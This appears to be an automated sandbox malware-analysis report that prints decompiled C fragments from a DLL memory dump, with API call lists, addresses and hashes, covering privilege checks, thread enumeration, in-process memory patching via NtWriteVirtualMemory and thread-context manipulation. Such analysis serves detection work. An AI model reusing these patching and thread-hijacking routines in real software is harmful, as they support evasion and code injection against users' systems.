                                                                                                        0x70982d01
                                                                                                        0x70982d0d
                                                                                                        0x70982d1a
                                                                                                        0x70982d2d
                                                                                                        0x70982d2d
                                                                                                        0x70982cf4
                                                                                                        0x70982d34
                                                                                                        0x70982d45
                                                                                                        0x70982d53
                                                                                                        0x70982d69
                                                                                                        0x70982d72
                                                                                                        0x70982d7a
                                                                                                        0x70982d7d
                                                                                                        0x70982d97
                                                                                                        0x70982d99
                                                                                                        0x70982da5
                                                                                                        0x70982da8
                                                                                                        0x70982dae
                                                                                                        0x70982db0
                                                                                                        0x70982db3
                                                                                                        0x70982db7
                                                                                                        0x70982dba
                                                                                                        0x70982dba
                                                                                                        0x70982dbe
                                                                                                        0x70982dc0
                                                                                                        0x70982dca
                                                                                                        0x70982dcc
                                                                                                        0x70982dcc
                                                                                                        0x70982dbe
                                                                                                        0x70982c93
                                                                                                        0x70982dd4
                                                                                                        0x70982dde
                                                                                                        0x70982dde
                                                                                                        0x70982de0
                                                                                                        0x70982dea
                                                                                                        0x70982dea
                                                                                                        0x70982dec
                                                                                                        0x70982df6
                                                                                                        0x70982df6
                                                                                                        0x70982df8
                                                                                                        0x70982e02
                                                                                                        0x70982e02
                                                                                                        0x70982e04
                                                                                                        0x70982e0e
                                                                                                        0x70982e10
                                                                                                        0x70982e10
                                                                                                        0x70982e15
                                                                                                        0x70982e15
                                                                                                        0x70982e1b
                                                                                                        0x70982e25
                                                                                                        0x70982e25
                                                                                                        0x70982e27
                                                                                                        0x70982e31
                                                                                                        0x70982e3e
                                                                                                        0x70982e3e

                                                                                                        APIs
                                                                                                        • CoInitializeEx.OLE32(00000000,00000006), ref: 70982AD0
                                                                                                        • CoCreateInstance.OLE32(7098D35C,00000000,00000001,7098D28C,?), ref: 70982AEC
                                                                                                        • SysAllocString.OLEAUT32(00787680), ref: 70982B0D
                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 70982B2C
                                                                                                        • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 70982B49
                                                                                                        • StrChrW.SHLWAPI(7098C638,00000057), ref: 70982B68
                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 70982B6B
                                                                                                        • StrChrW.SHLWAPI(7098C60C,00000057), ref: 70982B9B
                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 70982B9E
                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 70982BBA
                                                                                                        • VariantInit.OLEAUT32(?), ref: 70982BF1
                                                                                                        • StrChrW.SHLWAPI(7098C5F4), ref: 70982C19
                                                                                                        • StrChrW.SHLWAPI(7098C5E4,00000043,00000000,?,00000000), ref: 70982C3E
                                                                                                        • lstrlenW.KERNEL32(?), ref: 70982C7E
                                                                                                        • SysAllocStringLen.OLEAUT32(?,-00000002), ref: 70982C89
                                                                                                        • PathQuoteSpacesW.SHLWAPI(00000000), ref: 70982CA1
                                                                                                        • VariantInit.OLEAUT32(?), ref: 70982CAC
                                                                                                        • StrChrW.SHLWAPI(7098C5C8,00000043,00000000,?,00000000), ref: 70982CD2
                                                                                                        • SysAllocString.OLEAUT32(?), ref: 70982CEA
                                                                                                        • StrChrW.SHLWAPI(7098C5A4,00000043,00000000,?,00000000), ref: 70982D1E
                                                                                                        • VariantInit.OLEAUT32(?), ref: 70982D34
                                                                                                        • StrChrW.SHLWAPI(7098C56C,00000050,00000000,?,00000000), ref: 70982D5E
                                                                                                        • StrChrW.SHLWAPI(7098C5E4,00000043), ref: 70982D7A
                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 70982D7D
                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 70982DB0
                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 70982DB3
                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 70982DBA
                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 70982E15
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: String$AllocFree$InitVariant$BlanketCreateInitializeInstancePathProxyQuoteSpaceslstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3932495391-0
                                                                                                        • Opcode ID: 7e638482a3abe852c80aaac8a80e8fd35eb52f2e0313453d4d0431c1dc2dd308
                                                                                                        • Instruction ID: 1665d9258b6a1b729005e24cf9e537130c3d6e1109b0b61ceb3c5d00fe77157d
                                                                                                        • Opcode Fuzzy Hash: 7e638482a3abe852c80aaac8a80e8fd35eb52f2e0313453d4d0431c1dc2dd308
                                                                                                        • Instruction Fuzzy Hash: C5B1F6B1608305AFD300DFA5CC84E5BBBE9AFC9704F10491DF6499B391DA75E905CBA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709834E0, Relevance: 19.6, APIs: 13, Instructions: 108memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 89%
                                                                                                        			E709834E0() {
				intOrPtr _v4;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				void* _v20;
				void* _v24;
				long _v28;
				int _t25;
				int _t33;
				void* _t56;

				_v12 = 0;
				_v20 = 0;
				if(OpenProcessToken(0xffffffff, 8,  &_v20) == 0) {
					return 0;
				} else {
					_v24 = 0;
					_t25 = GetTokenInformation(_v20, 1, 0, 0,  &_v24); // executed
					if(_t25 == 0 && GetLastError() == 0x7a) {
						_t56 = HeapAlloc(GetProcessHeap(), 8, _v28);
						if(_t56 != 0) {
							_t33 = GetTokenInformation(_v24, 1, _t56, _v28,  &_v28); // executed
							if(_t33 != 0) {
								_v16.Value = 0;
								_v12 = 0x500;
								_v24 = 0;
								if(AllocateAndInitializeSid( &_v16, 1, 0x12, 0, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
									if(EqualSid( *_t56, _v24) == 0) {
										_push(_v4);
										_push( *_t56);
										L7098BF98();
									} else {
										_v20 = 1;
									}
								}
								FreeSid(_v24);
							}
							HeapFree(GetProcessHeap(), 0, _t56);
						}
					}
					CloseHandle(_v24);
					return _v16.Value;
				}
			}












                                                                                                        0x709834f2
                                                                                                        0x709834f6
                                                                                                        0x70983502
                                                                                                        0x709835fe
                                                                                                        0x70983508
                                                                                                        0x7098351d
                                                                                                        0x70983521
                                                                                                        0x70983525
                                                                                                        0x70983551
                                                                                                        0x70983555
                                                                                                        0x7098356d
                                                                                                        0x70983571
                                                                                                        0x70983588
                                                                                                        0x7098358c
                                                                                                        0x70983593
                                                                                                        0x7098359f
                                                                                                        0x709835b1
                                                                                                        0x709835c3
                                                                                                        0x709835c4
                                                                                                        0x709835c5
                                                                                                        0x709835b3
                                                                                                        0x709835b3
                                                                                                        0x709835b3
                                                                                                        0x709835b1
                                                                                                        0x709835cf
                                                                                                        0x709835cf
                                                                                                        0x709835da
                                                                                                        0x709835da
                                                                                                        0x709835e0
                                                                                                        0x709835e6
                                                                                                        0x709835f6
                                                                                                        0x709835f6

                                                                                                        APIs
                                                                                                        • OpenProcessToken.ADVAPI32(000000FF,00000008,?,00000100,00000000), ref: 709834FA
                                                                                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,?,77E34620), ref: 70983521
                                                                                                        • GetLastError.KERNEL32 ref: 7098352B
                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,74B04F20), ref: 70983548
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 7098354B
                                                                                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 7098356D
                                                                                                        • AllocateAndInitializeSid.ADVAPI32 ref: 70983597
                                                                                                        • EqualSid.ADVAPI32(?,00000000), ref: 709835A9
                                                                                                        • ConvertSidToStringSidW.ADVAPI32(00000000,?), ref: 709835C5
                                                                                                        • FreeSid.ADVAPI32(00000000), ref: 709835CF
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 709835D7
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 709835DA
                                                                                                        • CloseHandle.KERNEL32(?), ref: 709835E6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Heap$ProcessToken$FreeInformation$AllocAllocateCloseConvertEqualErrorHandleInitializeLastOpenString
                                                                                                        • String ID:
                                                                                                        • API String ID: 1769087308-0
                                                                                                        • Opcode ID: 37a4a806b27f25b10aa89a6a07c67739ebc26aaa68cdfb7a40dcd1e3e9f6da2a
                                                                                                        • Instruction ID: c84f85a42289435280ddad0cedef3ba2d1dd61225c5b2c009df2c9c6fa99ed01
                                                                                                        • Opcode Fuzzy Hash: 37a4a806b27f25b10aa89a6a07c67739ebc26aaa68cdfb7a40dcd1e3e9f6da2a
                                                                                                        • Instruction Fuzzy Hash: 66314DB2218301AFD700DFA5CC84E6BBBBCEB88794F10891DF55687291D775E8059BA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 7098B420, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106memorynativethreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E7098B420(long* __esi) {
				long _t27;
				int _t28;
				long _t29;
				void _t31;
				long _t34;
				void* _t36;
				void* _t37;
				void* _t40;
				long _t44;
				void* _t52;
				void* _t53;
				void* _t55;
				intOrPtr _t57;
				long* _t58;
				void* _t60;
				long* _t62;

				_t58 = __esi;
				_t62[4] = 0;
				_t27 = NtQuerySystemInformation(5, 0, 0, _t62); // executed
				if(_t27 == 0xc0000004) {
					_t27 =  *_t62;
					if(_t27 != 0) {
						_t28 = VirtualAlloc(0, _t27, 0x1000, 4); // executed
						_t55 = _t28;
						_t62[3] = _t55;
						if(_t55 == 0) {
							L23:
							return _t28;
						}
						_t29 = NtQuerySystemInformation(5, _t55, _t62[1],  &(_t62[1])); // executed
						if(_t29 < 0 || _t62[1] <= 0) {
							L22:
							_t28 = VirtualFree(_t55, _t62[1], 0x8000);
							goto L23;
						} else {
							_t60 = _t55;
							do {
								if( *((intOrPtr*)(_t60 + 0x44)) != GetCurrentProcessId()) {
									L19:
									_t31 =  *_t60;
									if(_t31 == 0) {
										break;
									}
									goto L20;
								}
								_t40 = 0;
								if( *((intOrPtr*)(_t60 + 4)) <= 0) {
									goto L19;
								}
								_t8 = _t60 + 0xdc; // 0xdc
								_t62[4] = _t8;
								do {
									_t57 =  *(_t62[4]);
									if(_t57 == GetCurrentThreadId()) {
										goto L17;
									}
									_t34 =  *_t58;
									if(_t34 != 0) {
										_t44 = _t58[1];
										if(_t58[2] < _t44) {
											L16:
											 *((intOrPtr*)( *_t58 + _t58[2] * 4)) = _t57;
											_t58[2] = _t58[2] + 1;
											goto L17;
										}
										_t52 =  *0x7098f6d4; // 0x0
										_t36 = HeapReAlloc(_t52, 0, _t34, _t44 + _t44 + _t44 + _t44 + _t44 + _t44 + _t44 + _t44);
										if(_t36 == 0) {
											break;
										}
										_t58[1] = _t58[1] + _t58[1];
										 *_t58 = _t36;
										goto L16;
									}
									_t58[1] = 0x80;
									_t53 =  *0x7098f6d4; // 0x0
									_t37 = HeapAlloc(_t53, _t34, 0x200);
									 *_t58 = _t37;
									if(_t37 == 0) {
										break;
									}
									goto L16;
									L17:
									_t62[4] = _t62[4] + 0x40;
									_t40 = _t40 + 1;
								} while (_t40 <  *((intOrPtr*)(_t60 + 4)));
								_t55 = _t62[5];
								goto L19;
								L20:
								_t60 = _t60 + _t31;
							} while (_t60 != 0);
							goto L22;
						}
					}
				}
				return _t27;
			}



















                                                                                                        0x7098b420
                                                                                                        0x7098b42d
                                                                                                        0x7098b435
                                                                                                        0x7098b43f
                                                                                                        0x7098b445
                                                                                                        0x7098b44a
                                                                                                        0x7098b45b
                                                                                                        0x7098b461
                                                                                                        0x7098b463
                                                                                                        0x7098b469
                                                                                                        0x7098b561
                                                                                                        0x00000000
                                                                                                        0x7098b561
                                                                                                        0x7098b47c
                                                                                                        0x7098b483
                                                                                                        0x7098b550
                                                                                                        0x7098b55b
                                                                                                        0x00000000
                                                                                                        0x7098b494
                                                                                                        0x7098b495
                                                                                                        0x7098b498
                                                                                                        0x7098b4a1
                                                                                                        0x7098b53f
                                                                                                        0x7098b53f
                                                                                                        0x7098b544
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7098b544
                                                                                                        0x7098b4a7
                                                                                                        0x7098b4ac
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7098b4b2
                                                                                                        0x7098b4b8
                                                                                                        0x7098b4c0
                                                                                                        0x7098b4c4
                                                                                                        0x7098b4ce
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7098b4d0
                                                                                                        0x7098b4d4
                                                                                                        0x7098b4f8
                                                                                                        0x7098b4fe
                                                                                                        0x7098b525
                                                                                                        0x7098b52a
                                                                                                        0x7098b52d
                                                                                                        0x00000000
                                                                                                        0x7098b52d
                                                                                                        0x7098b500
                                                                                                        0x7098b511
                                                                                                        0x7098b519
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7098b520
                                                                                                        0x7098b523
                                                                                                        0x00000000
                                                                                                        0x7098b523
                                                                                                        0x7098b4db
                                                                                                        0x7098b4e2
                                                                                                        0x7098b4ea
                                                                                                        0x7098b4f0
                                                                                                        0x7098b4f4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7098b530
                                                                                                        0x7098b530
                                                                                                        0x7098b535
                                                                                                        0x7098b536
                                                                                                        0x7098b53b
                                                                                                        0x00000000
                                                                                                        0x7098b546
                                                                                                        0x7098b546
                                                                                                        0x7098b546
                                                                                                        0x00000000
                                                                                                        0x7098b54f
                                                                                                        0x7098b483
                                                                                                        0x7098b44a
                                                                                                        0x7098b565

                                                                                                        APIs
                                                                                                        • NtQuerySystemInformation.NTDLL ref: 7098B435
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00000000,74B04970,74B05520,00000000), ref: 7098B45B
                                                                                                        • NtQuerySystemInformation.NTDLL(00000005,00000000,?,?), ref: 7098B47C
                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000), ref: 7098B498
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 7098B4C6
                                                                                                        • HeapAlloc.KERNEL32(00000000,00000000,00000200), ref: 7098B4EA
                                                                                                        • HeapReAlloc.KERNEL32(00000000,00000000,00000000,?), ref: 7098B511
                                                                                                        • VirtualFree.KERNEL32(00000000,00000005,00008000,00000005,00000000,?,?), ref: 7098B55B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Alloc$CurrentHeapInformationQuerySystemVirtual$FreeProcessThread
                                                                                                        • String ID: @
                                                                                                        • API String ID: 494489134-2766056989
                                                                                                        • Opcode ID: ab2ebf1bede340b46e2d4bd3c1977738dfe6343a7e551be50df290a72237223b
                                                                                                        • Instruction ID: 9560322c14920244f4a32179f1d644993baf91e363b9c006cb48c833c672a214
                                                                                                        • Opcode Fuzzy Hash: ab2ebf1bede340b46e2d4bd3c1977738dfe6343a7e551be50df290a72237223b
                                                                                                        • Instruction Fuzzy Hash: 383117B1208305AFE710DF25DD85B2B73B9AB84B45F14882DF996873D1EB70E944CB62
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709889F0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90nativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 62%
                                                                                                        			E709889F0() {
				intOrPtr _v4;
				intOrPtr _v12;
				intOrPtr _v28;
				long _v40;
				void _v44;
				void* _v48;
				intOrPtr _v56;
				long _v80;
				char _v88;
				intOrPtr _v92;
				void _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				long _v108;
				intOrPtr _v116;
				intOrPtr _v128;
				long _v132;
				long _t26;
				long _t28;
				long _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t42;
				long _t44;
				union _MEMORY_INFORMATION_CLASS _t47;
				void* _t49;
				intOrPtr _t52;

				_t31 = 0;
				_v80 = 0;
				_t26 = NtQuerySystemInformation(0,  &_v44, 0x2c,  &_v80); // executed
				if(_v28 <= 0) {
					return _t26;
				} else {
					_t52 = _v12;
					_t42 = _v4;
					do {
						_push(0x1c);
						_push( &_v88);
						L7098BF02();
						_t47 = 0;
						_v108 = 0;
						_t28 = NtQueryVirtualMemory(0xffffffff, _t31, 0,  &_v96, 0x1c,  &_v108);
						if(_t28 >= 0 && _v128 == 0x1c) {
							_t32 = _v116;
							if(_v100 == 0x1000 && _v96 == 4 && _v92 == 0x20000 && _v104 != _t42) {
								while(1) {
									_t28 = _t47 + _t32;
									__imp__RtlCompareMemory(_t52, _t28, _t42);
									if(_t28 == _t42) {
										break;
									}
									_t47 = _t47 + 1;
									if(_t47 < _v116 - _t42) {
										continue;
									}
									goto L11;
								}
								_t44 = _v40;
								_t49 = _t47 + _t32;
								_v132 = 0;
								_t30 = NtWriteVirtualMemory(0xffffffff, _t49, _v48, _t44,  &_v132); // executed
								_push(_t44);
								_push(_t49);
								_push(0xffffffff);
								L7098BF4A();
								return _t30;
							}
							L11:
							_t31 = _t32 + _v104;
						}
					} while (_t31 < _v56);
					return _t28;
				}
			}






























                                                                                                        0x709889ff
                                                                                                        0x70988a03
                                                                                                        0x70988a07
                                                                                                        0x70988a10
                                                                                                        0x70988ae2
                                                                                                        0x70988a16
                                                                                                        0x70988a17
                                                                                                        0x70988a1c
                                                                                                        0x70988a21
                                                                                                        0x70988a21
                                                                                                        0x70988a27
                                                                                                        0x70988a28
                                                                                                        0x70988a39
                                                                                                        0x70988a3f
                                                                                                        0x70988a43
                                                                                                        0x70988a4a
                                                                                                        0x70988a5b
                                                                                                        0x70988a5f
                                                                                                        0x70988a80
                                                                                                        0x70988a81
                                                                                                        0x70988a86
                                                                                                        0x70988a8e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70988a94
                                                                                                        0x70988a99
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70988a99
                                                                                                        0x70988ab1
                                                                                                        0x70988ac0
                                                                                                        0x70988ac5
                                                                                                        0x70988acd
                                                                                                        0x70988ad2
                                                                                                        0x70988ad3
                                                                                                        0x70988ad4
                                                                                                        0x70988ad6
                                                                                                        0x00000000
                                                                                                        0x70988add
                                                                                                        0x70988a9b
                                                                                                        0x70988a9b
                                                                                                        0x70988a9b
                                                                                                        0x70988a9f
                                                                                                        0x70988ab0
                                                                                                        0x70988ab0

                                                                                                        APIs
                                                                                                        • NtQuerySystemInformation.NTDLL(00000000,?,0000002C,?), ref: 70988A07
                                                                                                        • RtlZeroMemory.NTDLL(00000100,0000001C), ref: 70988A28
                                                                                                        • NtQueryVirtualMemory.NTDLL(000000FF,00000000,00000000,0000001C,0000001C,?), ref: 70988A43
                                                                                                        • RtlCompareMemory.NTDLL(?,00000000,?), ref: 70988A86
                                                                                                        • NtWriteVirtualMemory.NTDLL(000000FF,00000000,?,?,@)u), ref: 70988ACD
                                                                                                        • NtFlushInstructionCache.NTDLL ref: 70988AD6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Memory$QueryVirtual$CacheCompareFlushInformationInstructionSystemWriteZero
                                                                                                        • String ID: @)u
                                                                                                        • API String ID: 145697856-403505584
                                                                                                        • Opcode ID: b758945649e3cdca6e2c02a35f023d1392eef88f8f16e53c1537a7cc9096ba84
                                                                                                        • Instruction ID: 95b6aab0ec2ceb5d6eb887d8f9e39ec86202e5252a35765d01027eab957aa39f
                                                                                                        • Opcode Fuzzy Hash: b758945649e3cdca6e2c02a35f023d1392eef88f8f16e53c1537a7cc9096ba84
                                                                                                        • Instruction Fuzzy Hash: 3021B172108311AFD714DE55CC84EAFF7A9EBC4764F440A2EF6A6422C0C734A9498BB3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 7098B5F0, Relevance: 4.5, APIs: 3, Instructions: 37nativememorythreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E7098B5F0(void** _a4) {
				void* _t6;
				void* _t7;
				void** _t13;
				signed int _t17;
				void* _t20;
				void* _t22;

				_t13 = _a4;
				if( *_t13 != 0) {
					_t17 = 0;
					if(_t13[2] <= 0) {
						L7:
						_t7 =  *0x7098f6d4; // 0x0
						return HeapFree(_t7, 0,  *_t13);
					}
					do {
						_t20 = E7098B1A0(0x5a, 0,  *((intOrPtr*)( *_t13 + _t17 * 4)));
						_t22 = _t22 + 0xc;
						if(_t20 != 0) {
							NtResumeThread(_t20, 0); // executed
							NtClose(_t20); // executed
						}
						_t17 = _t17 + 1;
						_t5 =  &(_t13[2]); // 0xc30cc483
					} while (_t17 <  *_t5);
					goto L7;
				}
				return _t6;
			}









                                                                                                        0x7098b5f1
                                                                                                        0x7098b5f8
                                                                                                        0x7098b5fb
                                                                                                        0x7098b600
                                                                                                        0x7098b630
                                                                                                        0x7098b632
                                                                                                        0x00000000
                                                                                                        0x7098b641
                                                                                                        0x7098b603
                                                                                                        0x7098b612
                                                                                                        0x7098b614
                                                                                                        0x7098b619
                                                                                                        0x7098b61e
                                                                                                        0x7098b624
                                                                                                        0x7098b624
                                                                                                        0x7098b629
                                                                                                        0x7098b62a
                                                                                                        0x7098b62a
                                                                                                        0x00000000
                                                                                                        0x7098b62f
                                                                                                        0x7098b643

                                                                                                        APIs
                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,7098B7CC,?,74B05520,00000000), ref: 7098B63B
                                                                                                          • Part of subcall function 7098B1A0: NtOpenThread.NTDLL ref: 7098B1F2
                                                                                                        • NtResumeThread.NTDLL(00000000,00000000), ref: 7098B61E
                                                                                                        • NtClose.NTDLL(00000000), ref: 7098B624
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Thread$CloseFreeHeapOpenResume
                                                                                                        • String ID:
                                                                                                        • API String ID: 3496683721-0
                                                                                                        • Opcode ID: 6ffbba29f547f3355a75b7b40c52cacf84f6b4d669207c55c7068e4fc94d584d
                                                                                                        • Instruction ID: e04a1e617d4a12484623f4cd6043cd3d482859fcc85c157079c9270c1941e0c2
                                                                                                        • Opcode Fuzzy Hash: 6ffbba29f547f3355a75b7b40c52cacf84f6b4d669207c55c7068e4fc94d584d
                                                                                                        • Instruction Fuzzy Hash: 0DF0B431614520AFD7119B45CC81F5E33A8EB89711F180064F5019B3E4D3707C42CBA7
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 7098B340, Relevance: 3.1, APIs: 2, Instructions: 71nativethreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E7098B340(signed int __eax, void* _a4, intOrPtr _a8) {
				void* _v0;
				long _v536;
				intOrPtr _v540;
				struct _CONTEXT _v716;
				struct _CONTEXT _v720;
				void* __edi;
				long _t16;
				intOrPtr _t19;
				long _t20;
				signed int _t27;
				void* _t30;
				intOrPtr _t32;
				long _t37;
				signed int _t39;
				void* _t40;
				intOrPtr _t41;

				_t41 = _a8;
				_t39 = __eax;
				_v716 = 0x10001;
				_t16 = NtGetContextThread(_a4,  &_v716); // executed
				if(_t16 < 0) {
					L19:
					return _t16;
				}
				if(_t39 != 0xffffffff) {
					_t16 = _t39 + 1;
				} else {
					_t16 =  *0x7098f6e8; // 0x0
					_t39 = 0;
				}
				if(_t39 >= _t16) {
					goto L19;
				} else {
					_t27 = _t39 * 0x2c;
					_t37 = _v536;
					_t40 = _t16 - _t39;
					do {
						_t32 =  *0x7098f6e0; // 0x0
						_t19 = _t41;
						_t30 = _t27 + _t32;
						if(_t19 == 0) {
							_t20 = 0;
						} else {
							if(_t19 == 1) {
								_t20 = 1;
							} else {
								_t20 = ( *(_t30 + 0x14) & 0x000000ff) >> 0x00000002 & 0x00000001;
							}
						}
						if((( *(_t30 + 0x14) & 0x000000ff) >> 0x00000001 & 0x00000001) != _t20) {
							if(_t20 == 0) {
								_t20 = E7098B2D0(_t30, _t37);
							} else {
								_t20 = E7098B310(_t30, _t37);
							}
							if(_t20 != 0) {
								_v536 = _t20;
								_t20 = NtSetContextThread(_v0,  &_v720);
								_t37 = _v540;
							}
						}
						_t27 = _t27 + 0x2c;
						_t40 = _t40 - 1;
					} while (_t40 != 0);
					return _t20;
				}
			}



















                                                                                                        0x7098b34e
                                                                                                        0x7098b356
                                                                                                        0x7098b35e
                                                                                                        0x7098b366
                                                                                                        0x7098b36d
                                                                                                        0x7098b419
                                                                                                        0x7098b419
                                                                                                        0x7098b419
                                                                                                        0x7098b376
                                                                                                        0x7098b381
                                                                                                        0x7098b378
                                                                                                        0x7098b378
                                                                                                        0x7098b37d
                                                                                                        0x7098b37d
                                                                                                        0x7098b386
                                                                                                        0x00000000
                                                                                                        0x7098b38c
                                                                                                        0x7098b38f
                                                                                                        0x7098b395
                                                                                                        0x7098b39c
                                                                                                        0x7098b3a0
                                                                                                        0x7098b3a0
                                                                                                        0x7098b3a8
                                                                                                        0x7098b3ab
                                                                                                        0x7098b3ae
                                                                                                        0x7098b3c6
                                                                                                        0x7098b3b0
                                                                                                        0x7098b3b1
                                                                                                        0x7098b3bf
                                                                                                        0x7098b3b3
                                                                                                        0x7098b3ba
                                                                                                        0x7098b3ba
                                                                                                        0x7098b3b1
                                                                                                        0x7098b3d3
                                                                                                        0x7098b3d7
                                                                                                        0x7098b3e0
                                                                                                        0x7098b3d9
                                                                                                        0x7098b3d9
                                                                                                        0x7098b3d9
                                                                                                        0x7098b3e7
                                                                                                        0x7098b3f0
                                                                                                        0x7098b3fd
                                                                                                        0x7098b402
                                                                                                        0x7098b402
                                                                                                        0x7098b3e7
                                                                                                        0x7098b409
                                                                                                        0x7098b40c
                                                                                                        0x7098b40c
                                                                                                        0x00000000
                                                                                                        0x7098b410

                                                                                                        APIs
                                                                                                        • NtGetContextThread.NTDLL ref: 7098B366
                                                                                                        • NtSetContextThread.NTDLL(?,00010001), ref: 7098B3FD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ContextThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 1591575202-0
                                                                                                        • Opcode ID: 009067ed3b3a58dbe122ec0f1f7aa8276d07acb892df323ce4f0b923a9b5a3b8
                                                                                                        • Instruction ID: 4a694a175ac78823fc30702c200d0174385fc81538d196361ca91f6e57b8596a
                                                                                                        • Opcode Fuzzy Hash: 009067ed3b3a58dbe122ec0f1f7aa8276d07acb892df323ce4f0b923a9b5a3b8
